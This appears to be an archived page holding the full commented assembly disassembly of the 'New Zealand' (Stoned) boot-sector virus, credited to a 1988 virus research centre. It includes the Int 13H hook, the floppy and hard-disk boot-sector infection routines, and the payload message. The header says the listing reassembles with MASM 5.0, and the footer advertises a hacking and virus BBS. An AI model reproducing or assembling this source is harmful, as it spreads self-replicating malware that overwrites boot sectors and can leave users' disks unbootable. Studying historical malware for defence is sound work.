home *** CD-ROM | disk | FTP | other *** search
- page 65,132
-
- title The 'New Zealand' Virus
-
- ; ╔══════════════════════════════════════════════════════════════════════════╗
-
- ; ║ British Computer Virus Research Centre ║
-
- ; ║ 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ║
-
- ; ║ Telephone: Domestic 0273-26105, International +44-273-26105 ║
-
- ; ║ ║
-
- ; ║ The 'New Zealand' Virus ║
-
- ; ║ Disassembled by Joe Hirst, November 1988 ║
-
- ; ║ ║
-
- ; ║ Copyright (c) Joe Hirst 1988, 1989. ║
-
- ; ║ ║
-
- ; ║ This listing is only to be made available to virus researchers ║
-
- ; ║ or software writers on a need-to-know basis. ║
-
- ; ╚══════════════════════════════════════════════════════════════════════════╝
-
-
-
- ; The virus consists of a boot sector only. The original boot sector
-
- ; is kept at track zero, head one, sector three on a floppy disk, or
-
- ; track zero, head zero, sector two on a hard disk.
-
-
-
- ; The disassembly has been tested by re-assembly using MASM 5.0.
-
-
-
- ; The program requires an origin address of 7C00H, as it is designed
-
- ; to load and run as a boot sector.
-
-
-
- RAM SEGMENT AT 0
-
-
-
- ; System data
-
-
-
- ORG 4CH
-
- BW004C DW ? ; Interrupt 19 (13H) offset
-
- BW004E DW ? ; Interrupt 19 (13H) segment
-
- ORG 413H
-
- BW0413 DW ? ; Total RAM size
-
- ORG 440H
-
- BB0440 DB ? ; Motor timeout counter
-
- ORG 46CH
-
- BB046C DB ? ; System clock
-
-
-
- ORG 7C0AH
-
- I13_OF DW ?
-
- I13_SG DW ?
-
- HICOOF DW ?
-
- HICOSG DW ? ; High core segment
-
-
-
- RAM ENDS
-
-
-
- CODE SEGMENT BYTE PUBLIC 'CODE'
-
- ASSUME CS:CODE,DS:RAM
-
-
-
- START: DB 0EAH ; Far jump to next byte
-
- DW BP0010, 07C0H
-
-
-
- BP0010: JMP BP0110
-
-
-
- DRIVEN DB 0 ; Drive number (A=0, B=1, C=2)
-
- DUMMY DB 0
-
-
-
- ; Original Int 13H address
-
-
-
- INT_13 EQU THIS DWORD
-
- DW 0
-
- DW 0
-
-
-
- ; Branch address in high core
-
-
-
- HIGHCO EQU THIS DWORD
-
- DW BP0120
-
- DW 0
-
-
-
- ; Boot sector processing address
-
-
-
- BOOTST EQU THIS DWORD
-
- DW 07C00H
-
- DW 0
-
-
-
- ; Interrupt 13H disk I/O routine
-
-
-
- BP0020: PUSH DS
-
- PUSH AX
-
- CMP AH,2 ; Sub-function 2
-
- JB BP0030 ; Pass on if below
-
- CMP AH,4 ; Sub-function 4
-
- JNB BP0030 ; Pass on if not below
-
- CMP DL,0 ; Is drive A
-
- JNE BP0030 ; Pass on if not
-
- XOR AX,AX ; \ Segment zero
-
- MOV DS,AX ; /
-
- MOV AL,BB0440 ; Get motor timeout counter
-
- OR AL,AL ; Test for zero
-
- JNE BP0030 ; Branch if not
-
- CALL BP0040 ; Call infection routine
-
- BP0030: POP AX
-
- POP DS
-
- JMP INT_13 ; Pass control to Int 13H
-
-
-
- ; Infection routine
-
-
-
- BP0040: PUSH BX
-
- PUSH CX
-
- PUSH DX
-
- PUSH ES
-
- PUSH SI
-
- PUSH DI
-
- MOV SI,4 ; Retry count
-
- BP0050: MOV AX,201H ; Read one sector
-
- PUSH CS ; \ Set ES to CS
-
- POP ES ; /
-
- MOV BX,200H ; Boot sector buffer
-
- MOV CX,1 ; Track zero, sector 1
-
- XOR DX,DX ; Head zero, drive A
-
- PUSHF ; Fake an interrupt
-
- CALL INT_13 ; Call Int 13H
-
- JNB BP0060 ; Branch if no error
-
- XOR AX,AX ; Reset disk sub-system
-
- PUSHF ; Fake an interrupt
-
- CALL INT_13 ; Call Int 13H
-
- DEC SI ; Decrement retry count
-
- JNE BP0050 ; Retry
-
- JMP BP0080 ; No more retries
-
-
-
- BP0060: XOR SI,SI ; Start of program
-
- MOV DI,200H ; Boot sector buffer
-
- MOV AX,ES:[SI] ; Get first word
-
- CMP AX,ES:[DI] ; Test if same
-
- JNE BP0070 ; Install if not
-
- MOV AX,ES:[SI+2] ; Get second word
-
- CMP AX,ES:[DI+2] ; Test if same
-
- JNE BP0070 ; Install if not
-
- JMP BP0080 ; Pass on
-
-
-
- BP0070: MOV AX,301H ; Write one sector
-
- MOV BX,200H ; Boot sector buffer
-
- MOV CX,3 ; Track zero, sector 3
-
- MOV DX,100H ; Head 1, drive A
-
- PUSHF ; Fake an interrupt
-
- CALL INT_13 ; Call Int 13H
-
- JB BP0080 ; Branch if error
-
- MOV AX,301H ; Write one sector
-
- XOR BX,BX ; This sector
-
- MOV CL,1 ; Track zero, sector 1
-
- XOR DX,DX ; Head zero, drive A
-
- PUSHF ; Fake an interrupt
-
- CALL INT_13 ; Call Int 13H
-
- BP0080: POP DI
-
- POP SI
-
- POP ES
-
- POP DX
-
- POP CX
-
- POP BX
-
- RET
-
-
-
- ; Display message
-
-
-
- BP0090: MOV AL,CS:[BX] ; Get next message byte
-
- INC BX ; Update pointer
-
- CMP AL,0 ; Test for end of message
-
- JNE BP0100 ; Branch to display
-
- RET
-
-
-
- BP0100: PUSH AX
-
- PUSH BX
-
- MOV AH,0EH ; Write TTY mode
-
- MOV BH,0
-
- INT 10H ; VDU I/O
-
- POP BX
-
- POP AX
-
- JMP SHORT BP0090 ; Process next byte
-
-
-
- ; Install in high core
-
-
-
- BP0110: XOR AX,AX ; \ Segment zero
-
- MOV DS,AX ; /
-
- CLI
-
- MOV SS,AX ; \ Set stack to boot sector area
-
- MOV SP,7C00H ; /
-
- STI
-
- MOV AX,BW004C ; Get Int 13H offset
-
- MOV I13_OF,AX ; Store in jump offset
-
- MOV AX,BW004E ; Get Int 13H segment
-
- MOV I13_SG,AX ; Store in jump segment
-
- MOV AX,BW0413 ; Get total RAM size
-
- DEC AX ; \ Subtract 2k
-
- DEC AX ; /
-
- MOV BW0413,AX ; Replace total RAM size
-
- MOV CL,6 ; Bits to move
-
- SHL AX,CL ; Convert to Segment
-
- MOV ES,AX ; Set ES to segment
-
- MOV HICOSG,AX ; Move segment to jump address
-
- MOV AX,OFFSET BP0020 ; Get Int 13H routine address
-
- MOV BW004C,AX ; Set new Int 13H offset
-
- MOV BW004E,ES ; Set new Int 13H segment
-
- MOV CX,OFFSET ENDADR ; Load length of program
-
- PUSH CS ; \ Set DS to CS
-
- POP DS ; /
-
- XOR SI,SI ; \ Set pointers to zero
-
- MOV DI,SI ; /
-
- CLD
-
- REPZ MOVSB ; Copy program to high core
-
- JMP HIGHCO ; Branch to next instruc in high core
-
-
-
- ; Continue processing in high core
-
-
-
- BP0120: MOV AX,0 ; Reset disk sub-system
-
- INT 13H ; Disk I/O
-
- XOR AX,AX ; \ Segment zero
-
- MOV ES,AX ; /
-
- ASSUME DS:NOTHING,ES:RAM
-
- MOV AX,201H ; Read one sector
-
- MOV BX,7C00H ; Boot sector buffer address
-
- CMP DRIVEN,0 ; Test drive is A
-
- JE BP0130 ; Branch if yes
-
- MOV CX,2 ; Track zero, sector 2
-
- MOV DX,80H ; Side zero, drive C
-
- INT 13H ; Disk I/O
-
- JMP BP0150 ; Pass control to boot sector
-
-
-
- ; Floppy disk
-
-
-
- BP0130: MOV CX,3 ; Track zero, sector 3
-
- MOV DX,100H ; Side one, drive A
-
- INT 13H ; Disk I/O
-
- JB BP0150 ; Branch if error
-
- TEST BB046C,7 ; Test low byte of time
-
- JNZ BP0140 ; Branch if not 7
-
- MOV BX,OFFSET MESSAGE ; Load message address
-
- CALL BP0090 ; Display message
-
- BP0140: PUSH CS ; \ Set ES to CS
-
- POP ES ; /
-
- MOV AX,201H ; Read one sector
-
- MOV BX,200H ; C-disk boot sector buffer
-
- MOV CX,1 ; Track zero, sector 1
-
- MOV DX,80H ; Side zero, drive C
-
- INT 13H ; Disk I/O
-
- JB BP0150 ; Branch if error
-
- PUSH CS ; \ Set DS to CS
-
- POP DS ; /
-
- MOV SI,200H ; C-disk boot sector buffer
-
- MOV DI,0 ; Start of program
-
- MOV AX,[SI] ; Get first word
-
- CMP AX,[DI] ; Compare to C-disk
-
- JNE BP0160 ; Install on C-disk if different
-
- MOV AX,[SI+2] ; Get second word
-
- CMP AX,[DI+2] ; Compare to C-disk
-
- JNE BP0160 ; Install on C-disk if different
-
- BP0150: MOV DRIVEN,0 ; Drive A
-
- MOV DUMMY,0
-
- JMP BOOTST ; Pass control to boot sector
-
-
-
- ; Install on C-disk
-
-
-
- BP0160: MOV DRIVEN,2 ; Drive C
-
- MOV DUMMY,0
-
- MOV AX,301H ; Write one sector
-
- MOV BX,200H ; C-disk boot sector buffer
-
- MOV CX,2 ; Track zero, sector 2
-
- MOV DX,80H ; side zero, drive C
-
- INT 13H ; Disk I/O
-
- JB BP0150 ; Branch if error
-
- PUSH CS ; \ Set DS to CS
-
- POP DS ; /
-
- PUSH CS ; \ Set ES to CS
-
- POP ES ; /
-
- MOV SI,OFFSET ENDADR+200H ; Target offset
-
- MOV DI,OFFSET ENDADR ; Source offset
-
- MOV CX,OFFSET 400H-ENDADR ; Length to move
-
- REPZ MOVSB ; Copy C-disk boot sector
-
- MOV AX,301H ; Write one sector
-
- MOV BX,0 ; Write this sector
-
- MOV CX,1 ; Track zero, sector 1
-
- MOV DX,80H ; Side zero, drive C
-
- INT 13H ; Disk I/O
-
- JMP SHORT BP0150 ; Pass control to boot sector
-
-
-
- MESSAGE DB 7, 'Your PC is now Stoned!', 7, 0DH, 0AH, 0AH, 0
-
- DB 'LEGALISE MARIJUANA!'
-
-
-
- ENDADR EQU $-1
-
-
-
- CODE ENDS
-
-
-
- END START
-
- �
-
- ; ─────────────────────────────────────────────────────────────────────────
-
- ; ────────────────────> and Remember Don't Forget to Call <────────────────
-
- ; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
-
- ; ─────────────────────────────────────────────────────────────────────────
-
-
-
-
